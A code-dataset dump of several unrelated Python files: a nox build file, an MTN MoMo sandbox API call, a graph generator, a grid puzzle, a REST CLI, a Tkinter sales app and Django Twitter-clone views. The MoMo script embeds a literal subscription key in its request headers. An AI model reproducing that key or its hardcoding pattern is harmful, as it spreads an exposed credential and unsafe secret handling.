"name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 18, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 18, "usage_type": "name"}]} +{"seq_id": "224931623", "text": "# Standard Library\nimport platform\n\nfrom pathlib import Path\n\n# Third Party Library\nimport nox\nimport nox.sessions\n\n# First Party Library\nfrom build import build_lark_parser\n\n\nnox.options.stop_on_first_error = True\n\ncurrent_python_version = \"%s.%s\" % platform.python_version_tuple()[:2]\n\n\npythons = [\"3.7\", \"3.8\"]\nassert current_python_version in pythons\npythons = [current_python_version]\n\nlark_parser_path = Path(\"jsonpath/lark_parser\")\n\n\n@nox.session(python=pythons, reuse_venv=True)\n@nox.parametrize(\n \"parser_backend\", [\"standalone\", \"lark-parser\"],\n)\ndef test(session: nox.sessions.Session, parser_backend):\n session.run(\n \"poetry\",\n \"install\",\n \"-v\",\n \"-E\",\n \"test\",\n *(\n (\"-E\", parser_backend)\n if parser_backend == \"lark-parser\"\n else tuple()\n ),\n \"--no-dev\",\n external=True,\n )\n if \"standalone\":\n if not lark_parser_path.exists():\n build_lark_parser()\n else:\n if lark_parser_path.exists():\n lark_parser_path.unlink()\n\n session.run(\"pytest\", \"-vv\", \"--cov=jsonpath\", \"--cov-append\")\n\n\n@nox.session\ndef build(session):\n session.run(\"poetry\", \"install\", \"-v\", \"--no-dev\", external=True)\n if not lark_parser_path.exists():\n build_lark_parser()\n session.run(\"poetry\", \"build\")\n", "sub_path": "noxfile.py", "file_name": "noxfile.py", "file_ext": "py", "file_size_in_byte": 1348, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "nox.options", "line_number": 14, "usage_type": "attribute"}, {"api_name": "platform.python_version_tuple", "line_number": 16, "usage_type": "call"}, {"api_name": "pathlib.Path", "line_number": 23, "usage_type": "call"}, {"api_name": "nox.sessions", "line_number": 30, "usage_type": "attribute"}, {"api_name": "build.build_lark_parser", "line_number": 47, "usage_type": "call"}, {"api_name": "nox.session", "line_number": 26, "usage_type": "call"}, {"api_name": "nox.parametrize", "line_number": 27, "usage_type": "call"}, {"api_name": "build.build_lark_parser", "line_number": 59, "usage_type": "call"}, {"api_name": "nox.session", "line_number": 55, "usage_type": "attribute"}]} +{"seq_id": "410376895", "text": "import httplib, urllib, base64, uuid,json\nheaders = {\n # Request headers\n 'Content-Type': 'application/json',\n 'Ocp-Apim-Subscription-Key': 'f262afa7a68a4acfac4f60a93cf0b017'\n}\nparams = urllib.urlencode({\n})\nbody = json.dumps({\n \"providerCallbackHost\": \"https://github.com/oswald-pro/I-m-paying-my-tuition/blob/master/v1_0/apiuser/1dca2309-a740-4141-b48b-b25bd2b74a61/apikey/apikey.py\" })\ntry:\n conn = httplib.HTTPSConnection('sandbox.momodeveloper.mtn.com')\n conn.request(\"POST\", \"/v1_0/apiuser/1dca2309-a740-4141-b48b-b25bd2b74a61/apikey?%s\" % params, body, headers)\n response = conn.getresponse()\n print(response.status)\n print(response.reason)\n data = response.read()\n print(data)\n conn.close()\nexcept Exception as e:\n print(\"[Errno {0}] {1}\".format(e.errno, e.strerror))", "sub_path": "v1_0/apiuser/1dca2309-a740-4141-b48b-b25bd2b74a61/apikey/apikey.py", "file_name": "apikey.py", "file_ext": "py", "file_size_in_byte": 812, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "urllib.urlencode", "line_number": 7, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 9, "usage_type": "call"}, {"api_name": "httplib.HTTPSConnection", "line_number": 12, "usage_type": "call"}]} +{"seq_id": "53387603", "text": "import networkx\nimport numpy\nimport random\ndir_to_folder_of_graphs = \"/home/avi_kadria/Desktop/Shortest_cycles/directed_weighted_graphs\"\nindex = 1\n\n\ndef create_graph(num_vertices, p, min_weight, max_weight):\n global index\n graph = networkx.Graph()\n for i in range(num_vertices):\n graph.add_node(i)\n for i in range(num_vertices):\n for j in range(num_vertices):\n if random.random() < p:\n # in probability p adds an edge :\n w = random.randint(min_weight, max_weight)\n graph.add_edge(i, j, weight=w)\n new_dir = dir_to_folder_of_graphs + \"/\" + \"directed_weighted_nodes_\" + str(num_vertices) + \"_edges_\" \\\n + str(graph.number_of_edges()) + \"_min_weight_\" + str(min_weight) + \"_max_weight_\" + str(max_weight)\\\n + \"_index_\" + str(index)\n # networkx.write_gml(graph, new_dir)\n index += 1\n return graph\n\n\n\n\n\n#\n# for num_vertices in range(100, 1001, 100): # 10\n# for power in numpy.arange(0.7, 1.3, 0.001): # 6000\n# p = (num_vertices**power)/(num_vertices * (num_vertices-1))\n# for min_weight in range(0, 1001, 200): # 5\n# for max_weight in range(min_weight + 400, min_weight + 2000, 400): # 5\n# create_graph(num_vertices, p, min_weight, max_weight)\n#\n# # big graphs:\n# for num_vertices in range(1000, 10001, 1000): # 10\n# for power in numpy.arange(0.9, 1.1, 0.01): # 200\n# p = (num_vertices**power)/(num_vertices * (num_vertices-1))\n# for min_weight in range(10000, 100001, 10000): # 10\n# for max_weight in range(min_weight, min_weight + 1000000, 100000): # 11\n# create_graph(num_vertices, p, min_weight, max_weight)\n", "sub_path": "ShortestCycles/ShortestCycles/create_directed_weighted_graphs.py", "file_name": "create_directed_weighted_graphs.py", "file_ext": "py", "file_size_in_byte": 1727, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "networkx.Graph", "line_number": 10, "usage_type": "call"}, {"api_name": "random.random", "line_number": 15, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 17, "usage_type": "call"}]} +{"seq_id": "301895873", "text": "from enum import Enum\n\n\nclass Dir(Enum):\n UP = 0\n DOWN = 1\n LEFT = 2\n RIGHT = 3\n\n\nclass State(Enum):\n CLEAN = 0\n WEAKENED = 1\n INFECTED = 2\n FLAGGED = 3\n\n\nDIR_ORDER = [Dir.UP, Dir.RIGHT, Dir.DOWN, Dir.LEFT]\n\n\ndef turn(dir, diff):\n return DIR_ORDER[(DIR_ORDER.index(dir) + diff) % len(DIR_ORDER)]\n\n\ndef turn_left(dir):\n return turn(dir, -1)\n\n\ndef turn_right(dir):\n return turn(dir, +1)\n\n\ndef reverse_dir(dir):\n return turn(dir, +2)\n\n\ndef move(dir, x, y):\n if dir == Dir.UP:\n return x, y - 1\n elif dir == Dir.RIGHT:\n return x + 1, y\n elif dir == Dir.DOWN:\n return x, y + 1\n elif dir == Dir.LEFT:\n return x - 1, y\n\n\ndef run_virus(states, pos, dir, bursts):\n num_infected = 0\n for i in range(bursts):\n s = states.get(pos, State.CLEAN)\n if s == State.INFECTED:\n dir = turn_right(dir)\n states.pop(pos)\n else:\n dir = turn_left(dir)\n states[pos] = State.INFECTED\n num_infected += 1\n\n pos = move(dir, *pos)\n\n return num_infected\n\n\ndef run_virus_pt2(states, pos, dir, bursts):\n num_infected = 0\n for i in range(bursts):\n s = states.get(pos, State.CLEAN)\n if s == State.CLEAN:\n dir = turn_left(dir)\n states[pos] = State.WEAKENED\n elif s == State.WEAKENED:\n states[pos] = State.INFECTED\n num_infected += 1\n elif s == State.INFECTED:\n dir = turn_right(dir)\n states[pos] = State.FLAGGED\n elif s == State.FLAGGED:\n dir = reverse_dir(dir)\n states.pop(pos)\n\n pos = move(dir, *pos)\n\n return num_infected\n\n\ndef main():\n #with open('day22.input.txt') as f:\n # grid = [[c == '#' for c in line.strip()] for line in f.readlines()]\n\n grid = [[False, False, True], [True, False, False], [False, False, False]]\n\n height = len(grid)\n width = len(grid[0])\n pos = (width // 2, height // 2)\n dir = Dir.UP\n\n states = {}\n for y, row in enumerate(grid):\n for x, c in enumerate(row):\n if c:\n states[(x, y)] = State.INFECTED\n\n print(run_virus(states, pos, dir, 10000))\n\n print(run_virus_pt2(states, pos, dir, 100))\n\n\nif __name__ == '__main__':\n main()\n", "sub_path": "day22.py", "file_name": "day22.py", "file_ext": "py", "file_size_in_byte": 2296, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "enum.Enum", "line_number": 4, "usage_type": "name"}, {"api_name": "enum.Enum", "line_number": 11, "usage_type": "name"}]} +{"seq_id": "163280468", "text": "#!/usr/bin/python\n\nimport click\nimport requests\nfrom utils import file_util\nimport os\n\njson_rest_header = {'Accept' : 'application/json', 'Content-Type' : 'application/json'}\n\n\n@click.group()\ndef cli():\n pass\n\ndef load_config():\n current_dir = os.path.dirname(os.path.realpath(__file__))\n config_file = os.path.join(current_dir, \"config.json\")\n config_json = file_util.load_json_file(config_file)\n return config_json\n\n@cli.command()\n@click.argument('path')\ndef rest_get(path):\n config = load_config()\n res = requests.get(config['restapi_url'] + path)\n print(res.json())\n\n@cli.command()\n@click.argument('path')\n@click.argument('json_data_file')\ndef rest_post(path, json_data_file):\n config = load_config()\n url = config['restapi_url'] + path\n payload = open(json_data_file, 'rb').read()\n res = requests.post(url, data=payload, headers=json_rest_header)\n print(res.json())\n\n\nif __name__ == '__main__':\n cli()\n", "sub_path": "cli/heycli.py", "file_name": "heycli.py", "file_ext": "py", "file_size_in_byte": 949, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "click.group", "line_number": 11, "usage_type": "call"}, {"api_name": "os.path.dirname", "line_number": 16, "usage_type": "call"}, {"api_name": "os.path", "line_number": 16, "usage_type": "attribute"}, {"api_name": "os.path.realpath", "line_number": 16, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 17, "usage_type": "call"}, {"api_name": "os.path", "line_number": 17, "usage_type": "attribute"}, {"api_name": "utils.file_util.load_json_file", "line_number": 18, "usage_type": "call"}, {"api_name": "utils.file_util", "line_number": 18, "usage_type": "name"}, {"api_name": "requests.get", "line_number": 25, "usage_type": "call"}, {"api_name": "click.argument", "line_number": 22, "usage_type": "call"}, {"api_name": "requests.post", "line_number": 35, "usage_type": "call"}, {"api_name": "click.argument", "line_number": 29, "usage_type": "call"}, {"api_name": "click.argument", "line_number": 30, "usage_type": "call"}]} +{"seq_id": "431049418", "text": "from tkinter import *\nimport PIL\nfrom PIL import Image\nfrom PIL import ImageTk\nfrom datetime import date\nfrom datetime import datetime\nimport time\nfrom Ventana_Ventas import *\nfrom Retiros import Retiro\nfrom Proveedores import Proveedores\nfrom Reporte import Reportes\nfrom ControlStock import Productos\nfrom UltimosMov import Movimientos\nfrom Acerca_de import AcercaDe\nfrom Efectivo_en_caja import Efectivo\nfrom Registro_empleados import Registro\nfrom tkinter import messagebox\n# encoding: utf-8\n\nventas = Ventas()\nretiro = Retiro()\nproveedores = Proveedores()\nreportes = Reportes()\nproductos = Productos()\nmovimientos = Movimientos()\nacercade= AcercaDe()\nefectivo = Efectivo()\nregistro = Registro()\n\nclass Programa:\n def __init__(self):\n self.titulo = \"Sistema de ventas\"\n self.icono = \"@../GrupoD-Proyecto/Iconos/Registradora.xbm\"\n self.resizable = False\n self.color = \"#83D6A8\"\n\n def Inicio(self):\n # Iniciar ventana\n ventana_principal = Tk()\n self.ventana_principal = ventana_principal\n # Titulo\n ventana_principal.title(self.titulo)\n # Tamano de la ventana\n ox,oy=ventana_principal.winfo_screenwidth()/5,ventana_principal.winfo_screenheight()/5\n ventana_principal.geometry(\"=960x650+%d+%d\" % (ox-30,oy-100) )\n # Bloquear el tamano\n if (self.resizable):\n ventana_principal.resizable(1, 1)\n else:\n ventana_principal.resizable(0, 0)\n # Agregar Icono\n ventana_principal.iconbitmap(self.icono)\n # Configuraciones\n self.ventana_principal.config(\n bg=self.color\n )\n #######################################################################################\n #Frame logo\n frame1 = LabelFrame(self.ventana_principal, text = \"Opciones Usuario\")\n frame1.config(\n bg = \"#83D6A8\",\n bd = 5,\n width = 200,\n height = 500,\n font = (\"Arial\",14)\n )\n frame1.place(x = 40, y = 120)\n #Frame Menu\n frame2 = LabelFrame(self.ventana_principal, text = \"Menú de opciones\")\n frame2.config(\n bg = \"#83D6A8\",\n bd = 5,\n width = 660,\n height = 500,\n font =(\"Arial\",14)\n )\n frame2.place(x = 260, y = 120)\n #Frame franja\n frame3 =Frame(self.ventana_principal)\n frame3.config(\n bg = \"#4089D1\",\n bd = 3,\n width = 880,\n height = 50\n )\n frame3.place(x = 40, y = 15)\n \n \n # Imagen\n #Dimensiones globales\n global ancho\n global largo\n ancho = 185\n largo = 150\n \n imagen = Image.open(\"./Iconos/Loguito.jpg\")\n imagen.thumbnail((ancho, largo), Image.ANTIALIAS)\n render = ImageTk.PhotoImage(imagen)\n label_imagen =Label(frame1, image=render,\n width=ancho, height=largo)\n label_imagen.config(\n bg = \"#83D6A8\"\n )\n label_imagen.place(x=0, y=0)\n \n ################# Botones Frame1 ############################\n boton_retiro = Button(frame1, text=\"Retiro\", command = retiro.Inicio)\n boton_retiro.config(\n font=(\"Arial\", 14),\n relief=RAISED,\n padx=43,\n pady = 2,\n bd=3\n\n )\n boton_retiro.place(x = 18, y = 160)\n ############################################################\n boton_reporte = Button(frame1, text=\"Reportes\",command = reportes.Inicio)\n boton_reporte.config(\n font=(\"Arial\", 14),\n relief=RAISED,\n padx=29,\n pady = 2,\n bd=3\n\n )\n\n boton_reporte.place(x = 20, y = 220)\n\n ############################################################## \n boton_empleados = Button(frame1, text=\"Empleados\", command = registro.Inicio)\n boton_empleados.config(\n font=(\"Arial\", 14),\n relief=RAISED,\n padx=19,\n pady = 2,\n bd=3\n\n )\n boton_empleados.place(x = 21, y = 280)\n ############################################################## \n boton_salir = Button(frame1, text=\"Salir\", command = quit)\n boton_salir.config(\n font=(\"Arial\", 14),\n relief=RAISED,\n padx=50,\n pady = 2,\n bd=3\n\n )\n \n boton_salir.place(x = 19, y = 340)\n\n ################## Botones Frame 2 ############################\n #Boton Ventas\n ancho = 140\n largo = 140\n img_boton = Image.open(\"./Iconos/carrito.jpg\")\n img_boton.thumbnail((ancho, largo), Image.ANTIALIAS)\n render1 = ImageTk.PhotoImage(img_boton)\n boton = Button(frame2,image = render1, text = \"Ventas\", compound = \"top\",command = ventas.Inicio)\n boton.config(\n font = (\"Arial\", 14),\n width = 150,\n height = 160,\n relief = RAISED,\n bd = 4\n )\n boton.place(x = 20, y =50)\n #Boton Proveedores\n ancho = 140\n largo = 140\n img_boton2 = Image.open(\"./Iconos/Proveedores.jpg\")\n img_boton2.thumbnail((ancho, largo), Image.ANTIALIAS)\n render2 = ImageTk.PhotoImage(img_boton2)\n boton = Button(frame2,image = render2, text = \"Proveedores\", compound = \"top\",command = proveedores.Inicio)\n boton.config(\n font = (\"Arial\", 14),\n width = 150,\n height = 160,\n relief = RAISED,\n bd = 4\n )\n boton.place(x = 240, y =50)\n \n #Boton Stock\n ancho = 140\n largo = 140\n img_boton3 = Image.open(\"./Iconos/Productos.jpg\")\n img_boton3.thumbnail((ancho, largo), Image.ANTIALIAS)\n render3 = ImageTk.PhotoImage(img_boton3)\n boton = Button(frame2,image = render3, text = \"Productos\", compound = \"top\",command = productos.Inicio)\n boton.config(\n font = (\"Arial\", 14),\n width = 150,\n height = 160,\n relief = RAISED,\n bd = 4\n )\n boton.place(x = 460 , y =50)\n\n #Boton Dinero en Caja\n ancho = 140\n largo = 120\n img_boton5 = Image.open(\"./Iconos/Caja Fuerte.png\")\n img_boton5.thumbnail((ancho, largo), Image.ANTIALIAS)\n render5 = ImageTk.PhotoImage(img_boton5)\n boton = Button(frame2,image = render5, text = \"Efectivo en Caja\", compound = \"top\",command = efectivo.Inicio)\n boton.config(\n font = (\"Arial\", 14),\n width = 150,\n height = 160,\n relief = RAISED,\n bd = 4\n )\n boton.place(x = 20 , y =270)\n\n #Boton Ultimos Movimientos\n ancho = 140\n largo = 120\n img_boton6 = Image.open(\"./Iconos/Ultimos Movimientos.jpg\")\n img_boton6.thumbnail((ancho, largo), Image.ANTIALIAS)\n render6 = ImageTk.PhotoImage(img_boton6)\n boton = Button(frame2,image = render6,text = \"Movimientos\",compound = \"top\",command =movimientos.Inicio)\n boton.config(\n font = (\"Arial\", 14),\n width = 150,\n height = 160,\n relief = RAISED,\n bd = 4\n )\n boton.place(x = 240 , y =270)\n \n #Boton Acerca De\n ancho = 140\n largo = 120\n img_boton8 = Image.open(\"./Iconos/AcercaDe.png\")\n img_boton8.thumbnail((ancho, largo), Image.ANTIALIAS)\n render8 = ImageTk.PhotoImage(img_boton8)\n boton = Button(frame2,image = render8,text = \"Acerca de\",compound = \"top\",command = acercade.Inicio)\n boton.config(\n font = (\"Arial\", 14),\n width = 150,\n height = 160,\n relief = RAISED,\n bd = 4\n )\n boton.place(x = 460 , y =270)\n\n ###################### Textos ##############################\n texto = Label(self.ventana_principal, text = \"NOMBRE DEL NEGOCIO\")\n texto.config(\n bg =\"#83D6A8\",\n font = (\"Arial\", 20)\n )\n texto.place(x = 530,y=75)\n ###################### Fecha y hora ########################\n ###### Fecha #########\n fecha_actual = datetime.datetime.now()\n formato = fecha_actual.strftime('Fecha: %d / %m / %Y')\n fecha = Label(frame3, text = formato)\n fecha.config(\n bg = \"#4089D1\",\n font = (\"Arial\", 14)\n )\n fecha.place(x=210,y=0)\n ####### Hora ############\n def times():\n current_time = time.strftime('Hora: %H:%M:%S')\n hora.config(\n text = current_time,\n bg = \"#4089D1\",\n font = (\"Arial\", 14)\n )\n hora.after(200,times)\n\n hora = Label(frame3)\n hora.place(x= 450,y=0)\n times()\n self.ventana_principal.mainloop()\n\n", "sub_path": "Ventana_Inicio.py", "file_name": "Ventana_Inicio.py", "file_ext": "py", "file_size_in_byte": 8969, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "Retiros.Retiro", "line_number": 21, "usage_type": "call"}, {"api_name": "Proveedores.Proveedores", "line_number": 22, "usage_type": "call"}, {"api_name": "Reporte.Reportes", "line_number": 23, "usage_type": "call"}, {"api_name": "ControlStock.Productos", "line_number": 24, "usage_type": "call"}, {"api_name": "UltimosMov.Movimientos", "line_number": 25, "usage_type": "call"}, {"api_name": "Acerca_de.AcercaDe", "line_number": 26, "usage_type": "call"}, {"api_name": "Efectivo_en_caja.Efectivo", "line_number": 27, "usage_type": "call"}, {"api_name": "Registro_empleados.Registro", "line_number": 28, "usage_type": "call"}, {"api_name": "PIL.Image.open", "line_number": 96, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 96, "usage_type": "name"}, {"api_name": "PIL.Image.ANTIALIAS", "line_number": 97, "usage_type": "attribute"}, {"api_name": "PIL.Image", "line_number": 97, "usage_type": "name"}, {"api_name": "PIL.ImageTk.PhotoImage", "line_number": 98, "usage_type": "call"}, {"api_name": "PIL.ImageTk", "line_number": 98, "usage_type": "name"}, {"api_name": "PIL.Image.open", "line_number": 158, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 158, "usage_type": "name"}, {"api_name": "PIL.Image.ANTIALIAS", "line_number": 159, "usage_type": "attribute"}, {"api_name": "PIL.Image", "line_number": 159, "usage_type": "name"}, {"api_name": "PIL.ImageTk.PhotoImage", "line_number": 160, "usage_type": "call"}, {"api_name": "PIL.ImageTk", "line_number": 160, "usage_type": "name"}, {"api_name": "PIL.Image.open", "line_number": 173, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 173, "usage_type": "name"}, {"api_name": "PIL.Image.ANTIALIAS", "line_number": 174, "usage_type": "attribute"}, {"api_name": "PIL.Image", "line_number": 174, "usage_type": "name"}, {"api_name": "PIL.ImageTk.PhotoImage", "line_number": 175, "usage_type": "call"}, {"api_name": "PIL.ImageTk", "line_number": 175, "usage_type": "name"}, {"api_name": "PIL.Image.open", "line_number": 189, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 189, "usage_type": "name"}, {"api_name": "PIL.Image.ANTIALIAS", "line_number": 190, "usage_type": "attribute"}, {"api_name": "PIL.Image", "line_number": 190, "usage_type": "name"}, {"api_name": "PIL.ImageTk.PhotoImage", "line_number": 191, "usage_type": "call"}, {"api_name": "PIL.ImageTk", "line_number": 191, "usage_type": "name"}, {"api_name": "PIL.Image.open", "line_number": 205, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 205, "usage_type": "name"}, {"api_name": "PIL.Image.ANTIALIAS", "line_number": 206, "usage_type": "attribute"}, {"api_name": "PIL.Image", "line_number": 206, "usage_type": "name"}, {"api_name": "PIL.ImageTk.PhotoImage", "line_number": 207, "usage_type": "call"}, {"api_name": "PIL.ImageTk", "line_number": 207, "usage_type": "name"}, {"api_name": "PIL.Image.open", "line_number": 221, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 221, "usage_type": "name"}, {"api_name": "PIL.Image.ANTIALIAS", "line_number": 222, "usage_type": "attribute"}, {"api_name": "PIL.Image", "line_number": 222, "usage_type": "name"}, {"api_name": "PIL.ImageTk.PhotoImage", "line_number": 223, "usage_type": "call"}, {"api_name": "PIL.ImageTk", "line_number": 223, "usage_type": "name"}, {"api_name": "PIL.Image.open", "line_number": 237, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 237, "usage_type": "name"}, {"api_name": "PIL.Image.ANTIALIAS", "line_number": 238, "usage_type": "attribute"}, {"api_name": "PIL.Image", "line_number": 238, "usage_type": "name"}, {"api_name": "PIL.ImageTk.PhotoImage", "line_number": 239, "usage_type": "call"}, {"api_name": "PIL.ImageTk", "line_number": 239, "usage_type": "name"}, {"api_name": "datetime.datetime.datetime.now", "line_number": 259, "usage_type": "call"}, {"api_name": "datetime.datetime.datetime", "line_number": 259, "usage_type": "attribute"}, {"api_name": "datetime.datetime", "line_number": 259, "usage_type": "name"}, {"api_name": "time.strftime", "line_number": 269, "usage_type": "call"}]} +{"seq_id": "7810907", "text": "import os\nfrom .dataset import Dataset\n#tested manually\n\nclass DataReader:\n def __init__(self,path_to_file):\n self.path_to_file=os.path.abspath(path_to_file)\n\n\n def read(self):\n num_lines=[]\n\n file = open(self.path_to_file, 'r') \n lines = file.readlines()\n for line in lines:\n num_lines.append([float(num) for num in filter(None,line.split(\" \"))])\n # print(num_lines)\n return Dataset(num_lines)", "sub_path": "src/model_testing/data_processing/data_reader.py", "file_name": "data_reader.py", "file_ext": "py", "file_size_in_byte": 460, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "os.path.abspath", "line_number": 7, "usage_type": "call"}, {"api_name": "os.path", "line_number": 7, "usage_type": "attribute"}, {"api_name": "dataset.Dataset", "line_number": 18, "usage_type": "call"}]} +{"seq_id": "238581849", "text": "from django.shortcuts import render, redirect\nfrom django.views import View\nfrom django.template.response import TemplateResponse\nfrom django.http.response import HttpResponseRedirect\nfrom django.contrib.auth import authenticate, login, logout\nfrom django.views.generic.edit import CreateView\nfrom django.contrib.auth.mixins import LoginRequiredMixin\nfrom django.contrib.auth.models import User\nfrom .models import Tweet, Message, UserExtra\nfrom .forms import LoginForm, MessageForm, RegisterForm\nfrom django.db.models import Q\nfrom .serializers import TweetSerializer, MessageSerializer, UserExtraSerializer, UserSerializer\nfrom rest_framework.views import APIView\nfrom rest_framework.response import Response\nfrom rest_framework import status\nfrom django.http import Http404\nfrom django.core.exceptions import ValidationError\nfrom django.contrib import messages\n\n\nclass HomeView(LoginRequiredMixin, View):\n def get(self, request):\n user = request.user\n watched = user.additional_data.watched.all()\n if watched:\n query = Q()\n for e in watched:\n query = query | Q(user=e)\n query = query | Q(user=user)\n tweets = Tweet.objects.order_by('create_date').reverse().filter(query)\n else:\n tweets = Tweet.objects.filter(user=user)\n \n# if user.additional_data.watched.all():\n# watched_users = user.additional_data.watched.all()\n# all_users = User.objects.all()\n# tweets = Tweet.objects.all()\n# for check_user in all_users:\n# if check_user not in watched_users:\n# tweets.exclude(user=check_user)\n# tweets.order_by('create_date')\n# tweets.reverse()\n# else:\n# tweets = user.tweet_set.order_by('create_date')\n ctx = {\"tweets\": tweets} \n \n return TemplateResponse(request, 'home.html', ctx)\n \n def post(self, request): \n tweets = Tweet.objects.all()\n ctx = {\"tweets\": tweets}\n \n return TemplateResponse(request, 'home.html', ctx)\n\n\nclass TweetView(LoginRequiredMixin, View):\n def get(self, request, pk): \n tweet = Tweet.objects.get(id=pk) \n ctx = {\"tweet\": tweet} \n \n return TemplateResponse(request, 'tweet.html', ctx)\n \n \nclass AddTweetView(LoginRequiredMixin, CreateView):\n model = Tweet\n fields = ['content']\n template_name = \"add_tweet.html\" \n success_url = \"/\"\n \n def form_valid(self, form):\n form.instance.user = self.request.user\n return super(AddTweetView, self).form_valid(form)\n\n\nclass MessageView(LoginRequiredMixin, View):\n \n def get(self, request):\n user = request.user\n to_messages = Message.objects.filter(to_user=user)\n from_messages = Message.objects.filter(from_user=user)\n form = MessageForm()\n\n ctx = {\"to_messages\": to_messages, \n \"from_messages\": from_messages,\n \"form\": form,\n \n }\n \n return TemplateResponse(request, 'messages.html', ctx)\n\n def post(self, request):\n form = MessageForm(request.POST)\n user = request.user\n if form.is_valid():\n if form.cleaned_data['to_user'] == user:\n to_messages = Message.objects.filter(to_user=user)\n from_messages = Message.objects.filter(from_user=user)\n form = MessageForm()\n ctx = {\"to_messages\": to_messages, \n \"from_messages\": from_messages,\n \"form\": form, \n \"msg\": \"Nie można wysłać wiadomości do samego siebie!\" \n } \n return TemplateResponse(request, 'messages.html', ctx)\n else:\n Message.objects.create(content = form.cleaned_data['content'], to_user=form.cleaned_data['to_user'], from_user=user)\n to_messages = Message.objects.filter(to_user=user)\n from_messages = Message.objects.filter(from_user=user)\n form = MessageForm()\n ctx = {\"to_messages\": to_messages, \n \"from_messages\": from_messages,\n \"form\": form, \n } \n return TemplateResponse(request, 'messages.html', ctx)\n\nclass ShowMessageView(LoginRequiredMixin, View):\n \n def get(self, request, pk):\n user = request.user\n message = Message.objects.get(id=pk)\n if message.is_read == False and message.to_user == user:\n message.is_read = True\n message.save()\n \n\n ctx = {\"message\": message,\n \"user\": user, \n }\n \n return TemplateResponse(request, 'show_message.html', ctx)\n\n\nclass ShowUsersView(LoginRequiredMixin, View):\n \n def get(self, request):\n users = User.objects.all()\n logged_user = request.user\n \n ctx = {\n \"users\": users,\n \"logged_user\": logged_user,\n }\n\n return TemplateResponse(request, 'show_users.html', ctx)\n\n def post(self, request):\n user = request.user\n user_id = user.id\n user_watched_id = request.POST['user_id']\n user_watched = User.objects.get(id=user_watched_id)\n user_extra = UserExtra()\n user_extra.user = user\n user_extra.save()\n user = User.objects.get(id = user_id)\n user.additional_data.watched.add(user_watched)\n user.save()\n \n return redirect(\"/show_users\")\n\n \nclass LogoutView(View):\n def get(self, request):\n logout(request)\n ctx = {'msg': \"Zostałeś wylogowany\"}\n return HttpResponseRedirect('/login', ctx)\n \n\nclass LoginView(View):\n def get(self, request):\n form = LoginForm()\n ctx = {\"form\": form}\n return TemplateResponse(request, 'login.html', ctx)\n \n def post(self, request):\n form = LoginForm(request.POST)\n if form.is_valid():\n username = form.cleaned_data['user']\n password = form.cleaned_data['password']\n user = authenticate(username=username, password = password)\n \n \n if user is not None:\n login(request, user)\n ctx = {'msg': 'Zostałeś zalogowany'}\n return HttpResponseRedirect('/', ctx)\n \n else:\n form = LoginForm()\n ctx = {'form':form, 'msg': 'Błędne dane. Nie jesteś zalogowany'}\n return TemplateResponse(request, 'login.html', ctx)\n \n else:\n ctx = {\"form\": form, 'msg':'Błędne dane. Nie jesteś zalogowany'}\n return TemplateResponse(request, 'login.html', ctx)\n \nclass RegisterView(View):\n def get(self, request):\n form = RegisterForm()\n ctx = {\"form\": form}\n return TemplateResponse(request, 'register.html', ctx)\n \n def post(self, request):\n form = RegisterForm(request.POST)\n if form.is_valid():\n if form.cleaned_data['password'] == form.cleaned_data['confirm_password']:\n username = form.cleaned_data['user']\n password = form.cleaned_data['password']\n email = form.cleaned_data['email']\n user = User.objects.create_user(username=username, email=email, password=password)\n user_extra = UserExtra()\n user_extra.user = user\n user_extra.save() \n login(request, user)\n return HttpResponseRedirect('/')\n else:\n# raise ValidationError('Błędne hasło')\n msg = \"Błędne hasło\"\n form = RegisterForm()\n ctx = {\"form\": form, \"msg\": msg}\n return TemplateResponse(request, 'register.html', ctx)\n \n else:\n ctx = {\"form\": form, 'msg': 'Błędne dane'}\n return TemplateResponse(request, 'register.html', ctx)\n \n \n\n# AJAX VIEWS\n\n\nclass HomeAjaxView(LoginRequiredMixin, View):\n def get(self, request):\n return TemplateResponse(request, 'home_ajax.html')\n\n\n\n\n\n\n\n\n\n\n\n\n\n \n \n \n \n# API VIEWS\n\nclass HomeApiView(APIView):\n\n def get(self, request, format=None):\n user = request.user\n watched = user.additional_data.watched.all()\n if watched:\n query = Q()\n for e in watched:\n query = query | Q(user=e)\n query = query | Q(user=user)\n tweets = Tweet.objects.order_by('create_date').reverse().filter(query)\n else:\n tweets = Tweet.objects.filter(user=user)\n serializer = TweetSerializer(tweets, many=True, context={\"request\": request})\n return Response(serializer.data)\n\n def post(self, request, format=None):\n serializer = TweetSerializer(data=request.data)\n if serializer.is_valid():\n serializer.save()\n return Response(serializer.data, status=status.HTTP_201_CREATED)\n return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)\n\n \n \n \n \n ", "sub_path": "my_app/twitter/views.py", "file_name": "views.py", "file_ext": "py", "file_size_in_byte": 9320, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "django.contrib.auth.mixins.LoginRequiredMixin", "line_number": 21, "usage_type": "name"}, {"api_name": "django.views.View", "line_number": 21, "usage_type": "name"}, {"api_name": "django.db.models.Q", "line_number": 26, "usage_type": "call"}, {"api_name": "django.db.models.Q", "line_number": 28, "usage_type": "call"}, {"api_name": "django.db.models.Q", "line_number": 29, "usage_type": "call"}, 